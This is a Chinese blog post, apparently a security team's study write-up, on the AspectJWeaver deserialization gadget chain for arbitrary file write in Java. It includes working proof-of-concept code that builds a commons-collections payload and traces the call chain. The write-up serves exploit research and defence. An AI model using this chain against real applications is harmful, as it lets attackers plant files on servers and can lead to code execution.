Sangfor华东天勇战队:AspectJWeaver反序列化利用链

最新推荐文章于 2024-10-09 11:13:12 发布
最新推荐文章于 2024-10-09 11:13:12 发布
阅读量275 收藏
点赞数
文章标签: java 前端 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bring_coco/article/details/131391523
版权

依赖:

<dependencies>
    <dependency>
        <groupId>org.aspectj</groupId>
        <artifactId>aspectjweaver</artifactId>
        <version>1.9.2</version>
     </dependency>
</dependencies>

测试类:

import java.lang.reflect.Constructor;
import java.nio.charset.StandardCharsets;
import java.util.HashMap;

public class test {
    public static void main(String[] args) throws Exception{
        //反射获取构造函数
        Constructor con = Class.forName("org.aspectj.weaver.tools.cache.SimpleCache$StoreableCachingMap").getDeclaredConstructor(String.class,int.class);
        con.setAccessible(true);
        //实例化对象
        HashMap map =  (HashMap)con.newInstance("D:",1);
        //调用其put方法
        map.put("611.txt","无cc success!".getBytes(StandardCharsets.UTF_8));
    }
}

在这里插入图片描述
可以看到生成了611.txt文件,并且写入了内容
那么我们看看我们调用的哪个函数写入的

org.aspectj.weaver.tools.cache.SimpleCache$StoreableCachingMap

在这里插入图片描述
可以看到用的内部类,且是私有方法,两个参数分别为String和int类型,所以反射调用的时候需要

setAccessible(true)

然后实例化,就可以调用其put方法了,如下
在这里插入图片描述
在这里插入图片描述
可以看到key代表文件名,value代表文件内容

为什么要用到CC链呢?
因为只要能触发SimpleCache$StoreableCachingMap的put方法就能执行文件写入操作,CommonCollections中的LazyMap的get方法中存在put方法的调用
那么这里我们用commons-collections

<dependencies>
    <dependency>
        <groupId>commons-collections</groupId>
        <artifactId>commons-collections</artifactId>
        <version>3.1</version>
    </dependency>
    <dependency>
        <groupId>org.aspectj</groupId>
        <artifactId>aspectjweaver</artifactId>
        <version>1.9.2</version>
    </dependency>
</dependencies>

cc_test:

import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import javax.management.BadAttributeValueExpException;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.nio.charset.StandardCharsets;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

public class cc_test {
    public static void main(String[] args) throws Exception{
        //反射获取构造函数
        Constructor con = Class.forName("org.aspectj.weaver.tools.cache.SimpleCache$StoreableCachingMap").getDeclaredConstructor(String.class,int.class);
        con.setAccessible(true);
        //实例化对象
        HashMap map =  (HashMap)con.newInstance("D:",1);
        //这里用到ConstantTransformer是为了构造value,即写入文件的值
        ConstantTransformer transform = new ConstantTransformer("有cc".getBytes(StandardCharsets.UTF_8));
        //返回一个LazyMap对象
        Map outmap = LazyMap.decorate(map, transform);
        //利用TiedMapEntry和BadAttributeValueExpException,使反序列化BadAttributeValueExpException对象的时候触发LazyMap的get方法
        TiedMapEntry tiedmap = new TiedMapEntry(outmap, "612.txt");
        //这里为了序列化时不触发LazyMap的get方法
        BadAttributeValueExpException poc = new BadAttributeValueExpException(1);
        Field val = Class.forName("javax.management.BadAttributeValueExpException").getDeclaredField("val");
        val.setAccessible(true);
        val.set(poc,tiedmap);

        //序列化
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(out);
        oos.writeObject(poc);
        System.out.println(Base64.getEncoder().encodeToString(out.toByteArray()));
        //反序列化
        ByteArrayInputStream in = new ByteArrayInputStream(out.toByteArray());
        ObjectInputStream ois = new ObjectInputStream(in);
        ois.readObject();
    }
}

在这里插入图片描述
在这里插入图片描述
那么整体用到的就是

HashSet.readObject()
    HashMap.put()
        HashMap.hash()
            TiedMapEntry.hashCode()
                TiedMapEntry.getValue()
                    LazyMap.get()
                        SimpleCache$StorableCachingMap.put()
                            SimpleCache$StorableCachingMap.writeToPath()
                                FileOutputStream.write()
番茄酱料
关注
Tree前序反序列化
码莎拉蒂
08-12 2425
题目: 序列化:已知树如果当前节点不是空,则打印“值!” 如果为空,则打印“#!” 反序列化:1!2!#!#!3!#!#! 然后构建成树 比如树 1 2
[Java反序列化]AspectJWeaver反序列化
feng的博客
03-03 1601
[Java反序列化]AspectJWeaver反序列化 前言 2021年二月份ysoserialize增加了这条AspectJWeaver子,之后陆续在2021年的D3CTF以及国赛决赛中都出现了这条子的攻击,所以学习一下AspectJWeaver反序列化,之后再复现一下D3CTF和国赛决赛的两道Java。 依赖 <dependency> <groupId>commons-collections</groupId>
【Web】浅聊Java反序列化AspectJWeaver——任意文件写入
uuzeray的博客
03-10 1480
AspectJWeaverAspectJ 框架的一部分,是一个用于实现面向切面编程(AOP)的工具。AspectJWeaver 提供了在 Java 程序中使用 AspectJ 的功能,并通过字节码操纵技术来织入切面代码到应用程序的目标类中。这篇文章不聊怎么任意利用文件写入进而来RCE,只学习一下如何利用AspectJWeaver通过反序列化来进行任意文件写入。
D3CTF2021-non-RCE
feng的博客
03-07 4198
non-RCE 前言 去年D3CTF的题目,最近刚复现完国赛的那道Java,感觉出题的思路也是魔改的这题,所以来复现一下这题。 password绕过 不谈代码了,因为审完之后思路还是比较清晰的,就是利用JDBC对AsjpectJWeaver反序列化写文件到classpath然后反序列化rce。 第一重过滤是这个: public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterCha
Hessian 反序列化及相关利用
晓得哥的博客
02-29 2387
作者:Longofo@知道创宇404实验室 时间:2020年2月20日 原文地址:https://paper.seebug.org/1131/#_2 前不久有一个关于Apache Dubbo Http反序列化的漏洞,本来是一个正常功能(通过正常调用抓包即可验证确实是正常功能而不是非预期的Post),通过Post传输序列化数据进行远程调用,但是如果Post传递恶意的序列化数据就能进行恶意利用。Apa...
Java安全之Dubbo反序列化漏洞分析
m0_65462541的博客
12-21 2212
0x00 前言 最近天气冷,懒癌又犯了,加上各种项目使得本篇文断断续续。 0x01 Dubbo Dubbo是阿里巴巴开源的基于 Java 的高性能 RPC(一种远程调用) 分布式服务框架(SOA),致力于提供高性能和透明化的RPC远程服务调用方案,以及SOA服务治理方案。dubbo 支持多种序列化方式并且序列化是和协议相对应的。比如:Dubbo支持dubbo、rmi、hessian、http、webservice、thrift、redis等多种协议。 运行机制 Dubbo框架启动,容器Contai
Sangfor华东天勇战队:mybatis-plus demo
bring_coco的博客
06-26 361
这里可以看到用@Resource进行自动注入,为什么不用@Autowired进行自动注入呢,区别在于@Autowired是类型驱动的注入,而@Resource是名称驱动的注入,所以前者存在多bean问题,而后者,只要保证bean命名唯一就不会出现多bean的问题。更新和删除用到的方法会报错,如下因为类型问题,且selectByMap()下面有黄线,这是因为实体类没有配置无参构造函数,如下。UserMapper.java(接口类,继承BaseMapper,这里尖括号内写的是实体类)
Sangfor华东天勇战队:h2数据库console命令执行( CVE-2021-42392 漏洞)
bring_coco的博客
06-26 1130
通过漏洞公布,可以看到是在org.h2.util.JdbcUtils.getConnection的javax.naming.Context出问题的。可以看到class javax.naming.InitialContext是javax.naming.Contex的子类,因此进入if。根据调用栈顺序,我们进入到org.h2.server.web.WebServer#getConnection方法,如下。进入org.h2.server.web.WebApp#process方法。
Sangfor SCP平台开放API接口
08-26
Sangfor SCP平台开放API接口】是Sangfor公司提供的一个系统集成和二次开发平台。这个平台允许开发者通过REST(Representational State Transfer)风格的API接口,利用HTTPS请求进行调用,以实现与SCP平台的深度...
SANGFOR VDC&VMP - 05 服务器虚拟化.ppt
09-20
服务器虚拟化技术是一种高效利用硬件资源、提高数据中心效率的关键技术。深信服公司的SANGFOR VDC&VMP平台提供了两种主要的服务器虚拟化方式:快速虚拟化和迁移物理主机,以帮助用户平滑地将物理服务器转变为虚拟机...
SANGFOR_aDesk_SGAX显卡虚拟化方案.pptx
09-25
### SANGFOR_aDesk_SGAX显卡虚拟化方案知识点详解 #### 一、桌面面临的挑战及解决方案 在当前的企业环境中,传统的桌面解决方案面临着诸多挑战,例如设计图纸的难以管控和防泄密问题、运维效率低下以及支持成本...
MAC出现:未能正确打开SANGFOR SSL Virtual网卡,暂时不能提供SSL CS服务,请联系管理员
热门推荐
何新生(Daniel) 勇敢坚毅真正之才智乃刚毅之志向。 —— 拿破仑
06-02 1万+
summary
C语言 | 第十章 | 函数 作用域
ZJC744575的博客
10-05 1229
为完成某一功能的程序指令(语句)的集合,称为函数。在C语言中,函数分为:自定义函数、系统函数(查看C语言函数手册)函数还有其它叫法,比如方法等,在本视频课程中,我们统一称为 函数。返回类型 函数名(形参列表){执行语句...;// 函数体return 返回值;// 可选形参列表:表示函数的输入函数中的语句:表示为了实现某一功能代码块函数可以有返回值,也可以没有, 如果没有返回值,返回类型 声明为 void。
C++学习笔记----8、掌握类与对象(四)---- 不同类型的数据成员(1)
weixin_71738303的博客
10-05 935
c++对于数据成员给了你许多选项。除了在类中声明简单的数据成员,可以生成静态数据成员供所有类的对象共享,const成员,引用成员,reference-to-const成员,等等。本节我们解释一下这些不同类型的数据成员的细节。
JDK1.0主要特性
FoolRabbit的专栏
10-06 364
JDK1.0主要特性。
字符函数和字符串函数和内存函数
Java_fenxiang的博客
10-05 706
strtok函数原型与功能概述在 C 语言中,strtok函数的原型为char *strtok(char *str, const char *delim)。它的主要功能是将字符串str按照delim中指定的分隔符进行分割,返回被分割出来的子字符串。工作原理首次调用:当第一次调用strtok时,需要将待分割的字符串str作为...
Java中的break、continue和return语句
weixin_73230994的博客
10-05 378
break语句用于终止某个语句块的执行,一般使用在switch或者循环【for, while ,do-while】(提前退出或结束循环不是终止程序)1.continue语句用于结束本次循环,继续执行下一次循环2.continue语句出现在多层嵌套的循环语句体中时,可以通过标签指明要跳过的是哪一层循环,这个和前面的标签的使用规则一样。
Netty 相比原生IO模型的优势
最新发布
lssffy的博客
10-09 366
Java提供了多种I/O模型,每种模型都有其适用的场景和特点,随着网络应用需求的变化,I/O模型也在不断发展。阻塞I/O(BIO,Blocking I/O)传统的I/O模型,使用简单,但每次I/O操作都会阻塞线程。每个请求需要独立的线程来处理,这在并发请求较少时问题不大,但在高并发情况下,线程资源将成为瓶颈。非阻塞I/O(NIO,Non-Blocking I/O)引入了多路复用技术,一个线程可以处理多个连接,避免了BIO中每个连接占用一个线程的问题。通过Selector。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值